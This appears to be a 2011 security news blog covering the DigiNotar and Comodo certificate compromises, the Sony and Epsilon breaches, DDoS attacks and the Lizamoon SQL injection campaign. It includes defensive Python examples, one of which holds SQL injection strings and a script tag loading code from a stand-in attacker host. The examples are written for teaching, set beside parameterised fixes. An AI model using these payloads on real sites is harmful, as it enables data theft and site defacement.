Cybersecurity

DigiNotar, GlobalSign targeted.

The recent hack targeting the Dutch Internet Trust Provider DigiNotar appears to have been politically motivated, according to the apparent hacker: https://twitter.com/#!/ichsunx2.

According to the interim investigative report by Fox-IT, DigiNotar's infrastructure included unpatched web servers, no anti-virus on the servers, a weak domain administrator password and an intrusion prevention system that did not block the attacks on the web servers. The full report can be found here.

With access to these servers the attacker was able to issue bogus digital certificates, which has serious implications for organisations offering secure web services and for the users of those services. As a result, both Microsoft and Mozilla have revoked their trust in the DigiNotar Certificate Authority. Underlining the seriousness of this, Mozilla describes the removal as a "last resort" measure:

http://blog.mozilla.com/

As a precaution, another Certificate Authority, GlobalSign, has temporarily stopped issuing certificates following one of the first postings (http://pastebin.com/1AxH30em) by the apparent hacker. The BBC Tech website gives more details:

http://www.bbc.co.uk/news/technology-14819257

Rabobank targeted again.

Dutch bank Rabobank was this week targeted by a group known as the Conspiracy Cells of Fire, who launched a DDoS attack that brought its Internet Banking service down.

This again highlights how hard it is for an organisation to detect and block an attack whose whole premise is to have thousands, sometimes millions, of source machines send requests to a target server at the same time: no single source looks abusive on its own. Arbor Networks' Peakflow SP TMS product provides both detection and mitigation of these attacks, primarily by spotting anomalies in network traffic and acting in real time to block the offending traffic. Previously Arbor provided the detection and relied on a Cisco or Check Point product for the mitigation; nowadays both are built into a single product.

For an even more complete security solution, the Arbor product could be deployed in conjunction with IBM Security Network IPS, for example.

Take a look at this video to gain a better understanding of the benefits of the Arbor Peakflow SP TMS product, as explained by one European customer.
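The detect-then-block loop described above, as an added example that is not Arbor's or any vendor's code: a small anomaly detector over constructed per-second flow records. It learns a baseline of request rate and distinct-source count from a quiet window, flags seconds where both leave the baseline by k standard deviations, and, while flagged, drops sources the baseline never saw. The traffic shape, the addresses (10.0.x.x clients, 100.64.x.x bots) and the threshold k=4 are assumptions made for the example.

```python
import statistics
from collections import defaultdict


def make_sample():
    """Constructed flow records (second, source_ip), not captured traffic.
    Seconds 0-9: 20-22 requests/s from a pool of 22 clients.
    Seconds 10-12: a flood in which 900 distinct sources each send one
    request per second, i.e. each bot is quieter than a legitimate client."""
    records = []
    for t in range(10):
        for i in range(20 + t % 3):
            records.append((t, f"10.0.{i % 8}.{i}"))
    for t in range(10, 13):
        for i in range(900):
            records.append((t, f"100.64.{i // 256}.{i % 256}"))
    return records


def bucket(records):
    """Group records per second: second -> {source: request count}."""
    buckets = defaultdict(lambda: defaultdict(int))
    for t, src in records:
        buckets[t][src] += 1
    return dict(buckets)


def learn_baseline(buckets, train_seconds):
    """Mean and population stdev of requests/s and of distinct sources/s over
    the training window, plus the set of sources seen in that window."""
    rates = [sum(buckets[t].values()) for t in train_seconds]
    srcs = [len(buckets[t]) for t in train_seconds]
    known = set().union(*(buckets[t].keys() for t in train_seconds))
    return {
        "rate_mean": statistics.mean(rates), "rate_sd": statistics.pstdev(rates),
        "src_mean": statistics.mean(srcs), "src_sd": statistics.pstdev(srcs),
        "known_sources": known,
    }


def detect(buckets, baseline, k=4.0, min_sd=1.0):
    """Flag a second when BOTH the request rate and the number of distinct
    sources exceed baseline by k standard deviations. min_sd stops a flat
    baseline from producing a zero-width threshold."""
    rate_thr = baseline["rate_mean"] + k * max(baseline["rate_sd"], min_sd)
    src_thr = baseline["src_mean"] + k * max(baseline["src_sd"], min_sd)
    alerts = {}
    for t in sorted(buckets):
        rate = sum(buckets[t].values())
        nsrc = len(buckets[t])
        alerts[t] = rate > rate_thr and nsrc > src_thr
    return alerts


def mitigate(buckets, baseline, alerts):
    """During flagged seconds, drop every source the baseline never saw.
    Per-source rate limiting would not work here: each bot sends fewer
    requests than a real client, so only the aggregate anomaly is visible."""
    drop = set()
    for t, alerted in alerts.items():
        if alerted:
            drop |= set(buckets[t]) - baseline["known_sources"]
    return drop


if __name__ == "__main__":
    b = bucket(make_sample())
    base = learn_baseline(b, range(10))
    alerts = detect(b, base)
    print("flagged seconds:", [t for t, a in alerts.items() if a])
    print("sources to drop:", len(mitigate(b, base, alerts)))
```

The "unknown to the baseline" heuristic is deliberately crude: it assumes the quiet window saw the legitimate client population, which holds for a bank's regular customers far better than for a public news site, and it would have to be combined with a challenge (redirect, JavaScript check) rather than a hard drop before being used in production.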



Sony suffers second hacker attack.

Sony has suffered another blow to its brand reputation after warning an additional 25 million customers may have had their details stolen in a newly discovered attack by hackers.

The electronics giant has now taken a second online service offline, Sony Online Entertainment (SOE), which hosts massively multiplayer online (MMO) and Facebook games, after it was found to have been hacked last month.

Sony says personal information of 24.6 million customers including passwords, direct debit records and birthdates may have been stolen in the hack, discovered by its engineers earlier this week.

The techniques used in both recent Sony hacks appear to have been straightforward SQL injection attacks against Sony's databases. Such attacks could easily have been prevented with basic measures, first of all in the application itself (parameterised queries and input validation) and, as an extra layer, with Web Application Protection and Data Leakage Prevention (DLP), both of which are available in IBM Security Network IPS.

http://www.totaltele.com/view.aspx?ID=464556

Sony hack.

Sony has warned users of its PlayStation Network that their personal information, including credit card details, may have been stolen.

The company said that the data might have fallen into the hands of an "unauthorised person" following a hacking attack on its online service.

Access to the network was suspended last Wednesday, but Sony has only now revealed details of what happened.

Users are being warned to look out for attempted telephone and e-mail scams.

In a statement posted on the official PlayStation blog, Nick Caplin, the company's head of communications for Europe, said: "We have discovered that between April 17 and April 19 2011, certain PlayStation Network and Qriocity service user account information was compromised in connection with an illegal and unauthorized intrusion into our network".

See also their FAQ page:

http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593

Epsilon attack - "biggest security breach in US history"

The recent hack into Epsilon's client database resulted in millions of names and email addresses of its clients' customers being stolen.

Because each stolen record pairs a name and email address with the brand the person does business with, the expectation is that the theft will fuel a spate of new spear-phishing attacks.

http://personalmoneystore.com/moneyblog/2011/04/04/epsilon-database-hack-phishing-attacks/

Kaspersky Mobile Security 9

Kaspersky recently added Android and BlackBerry support to their Mobile Security 9 app, which already ran on Windows Mobile and Symbian.

The nice thing about this app is that it can remotely lock or wipe a stolen smartphone, even after the SIM card has been replaced.

The Symbian and Windows Mobile variants also let you encrypt the data stored on the phone and apply parental controls.

For a full list of features supported per Operating System, see:

http://usa.kaspersky.com/products-services/home-computer-security/mobile-security

In addition to these paid apps, Kaspersky also has an excellent free iPhone app, Threatpost, the Kaspersky Lab security news service.


Woops... Rabobank Internet Banking slip-up

During routine maintenance work on its Internet Banking service yesterday, some 900 customers of the Dutch bank Rabobank were able to see other account holders' bank account details while checking their own accounts online.

Rabobank quickly rectified the problem by restarting the service, which took Internet Banking offline for a short time.

According to Rabobank, no rogue transactions were performed while the fault was present.

http://www.rtl.nl

DNS.be name servers target of botnet attack

DNS.be has just released a press statement about an ongoing botnet attack on its name servers that started on 4 April. The attackers and their motives are as yet unknown.

http://blog.mxlab.eu/2011/04/05/2-dns-name-servers-of-dns-be-experienced-unusual-high-workload/

Lizamoon attack "most successful SQL injection attack ever"

I had just finished a presentation today on the very real need for web application protection to protect against SQL injection and Cross-Site Scripting attacks, when I came across the following two articles:

http://www.theregister.co.uk/2011/03/31/lizamoon_mass_injection_attack/
http://www.bbc.co.uk/news/technology-12933053

The attack uses SQL injection to insert into a legitimate website's database a reference to a malicious site; when a visitor loads a page that renders the injected content, the reference pulls in a pop-up that tries to get the visitor to install a fake anti-malware product purporting to be from Microsoft.

To get an idea of how many sites have been compromised by the first wave of the attack, simply Google the following: “lizamoon[dot]com[slash]ur.php”.

As the attack spreads it has now been modified to inject links to other rogue domains hosting the same piece of malware.
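The Sony data theft above and the Lizamoon mass injection are the read and write sides of the same application flaw. The following is an added example, not Sony's, Lizamoon's or any real site's code, using Python's built-in sqlite3 on constructed sample data: a lookup that leaks every user record when the input is concatenated rather than bound, an UPDATE in which an unquoted URL parameter turns a rename of one page into a defacement of every page, and the parameterised form beside each. The users, pages and the domain attacker.example are assumptions standing in for real data and the real rogue hosts.

```python
import sqlite3

# Constructed sample data for the example; not taken from any real site.
SAMPLE_USERS = [
    ("alice", "alice@example.com", "$2b$12$hashA"),
    ("bob",   "bob@example.com",   "$2b$12$hashB"),
    ("carol", "carol@example.com", "$2b$12$hashC"),
]
SAMPLE_PAGES = [
    ("Welcome", "Hello visitor"),
    ("Contact", "Write to us"),
]
# Hypothetical attacker-controlled host; the real campaign used other domains.
ROGUE_SCRIPT = '</title><script src="http://attacker.example/ur.php"></script>'


def make_db():
    """Fresh in-memory database populated with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, password_hash TEXT);"
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
    )
    conn.executemany(
        "INSERT INTO users (username, email, password_hash) VALUES (?, ?, ?)",
        SAMPLE_USERS)
    conn.executemany("INSERT INTO pages (title, body) VALUES (?, ?)", SAMPLE_PAGES)
    return conn


# --- Read side: the data-theft pattern ---------------------------------

def find_user_vulnerable(conn, username):
    """WHERE clause built by string formatting: the input becomes SQL.
    Input "' OR '1'='1" closes the quote and returns every row."""
    sql = f"SELECT username, email, password_hash FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    """Same query with a bound parameter: the input is only ever data."""
    sql = "SELECT username, email, password_hash FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# --- Write side: the mass-defacement pattern ---------------------------

def rename_page_vulnerable(conn, page_id, new_title):
    """page_id comes straight from the URL and is pasted, unquoted, into the
    UPDATE. page_id "1 OR 1=1" rewrites the title of every page. Returns the
    number of rows changed."""
    sql = f"UPDATE pages SET title = '{new_title}' WHERE id = {page_id}"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def rename_page_safe(conn, page_id, new_title):
    """Type-check the identifier, then bind both values. A non-numeric
    page_id raises ValueError before anything reaches the database."""
    pid = int(page_id)
    cur = conn.execute("UPDATE pages SET title = ? WHERE id = ?", (new_title, pid))
    conn.commit()
    return cur.rowcount


def pages_with_script(conn):
    """How many pages now carry an injected <script> tag in their title."""
    return conn.execute(
        "SELECT COUNT(*) FROM pages WHERE title LIKE '%<script%'").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("leak:", find_user_vulnerable(db, "' OR '1'='1"))   # all three users
    print("safe:", find_user_safe(db, "' OR '1'='1"))         # []
    rename_page_vulnerable(db, "1 OR 1=1", ROGUE_SCRIPT)      # defaces every page
    print("defaced pages:", pages_with_script(db))            # 2
```

Binding the values stops the mass UPDATE, but it does not make a stored title safe to render: if the application echoes it without output encoding, a single injected script tag still runs in every visitor's browser. Parameterised queries and output encoding are both required in the application; a web application firewall or IPS signature is a further layer, not the fix.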

Interview with ComodoHacker

After nine fraudulent certificates were recently obtained from Comodo, apparently by an Iranian hacker, Comodo released the following statement:

http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/

Ex-ISS Chief Scientist Robert Graham interviews the ComodoHacker.

http://erratasec.blogspot.com/2011/03/interview-with-comodohacker.html

Mixed messages but a real threat.

The varying opinions on the real (versus perceived) threat of cyber-security and cyber-warfare remind me of the mixed messages we get about what is good and what is bad for us.

The only difference is that I need to click on “Health” instead of “Technology” on the BBC website.

Compare the following two articles, for example:
http://www.bbc.co.uk/news/technology-12473809
http://www.bbc.co.uk/news/world-europe-12840941

What are we up against?

With so many different terms around these days for the different types of malware that exist and the different types of attacks we are facing, I thought it would be a good idea to clarify the definitions of some of the more commonly used terms.

Check out:
www.itsecurityunplugged.com.

By the way, today I am at the Brussels Expo @ www.infosecurity.be.